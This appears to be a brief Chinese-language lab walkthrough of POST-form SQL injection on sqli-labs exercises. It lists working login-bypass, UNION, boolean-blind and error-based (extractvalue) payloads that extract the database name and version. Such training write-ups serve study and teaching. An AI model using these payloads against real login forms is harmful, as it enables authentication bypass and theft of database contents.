Post注入
-
在登录过程中,输入用户名和密码,用户名和密码以表单的形式提交,
提交到服务器后服务器再进行验证。这就是一次post的过程的。 -
在输入正确的用户名和密码后显示
-
尝试会不会回显报错信息,输入
admin'--+,回显报错了。
-
尝试万能密码 admin’or’1’='1# ,成功登录并且回显信息。
-
尝试联合注入
Username:1admin'union select 1,database()#
password:(任意密码)
显示数据库名了。
Less13
- Username:admin’,分析报错,程序对id进行了’)的处理。
- 尝试布尔盲注,登录成功,可以利用二分法猜解。
uname=admin')and left(database(),1)>'a'#&passwd=1&submit=Submit
Less14
- 尝试盲注,登录成功。
admin"and left(database(),1)>'a'#&passwd=1&submit=Submit
2. 利用报错注入,成功回显数据库版本。
admin"and extractvalue(1,concat(0x7e,(select @@version),0x7e))#&passwd=1&submi
t=Submit
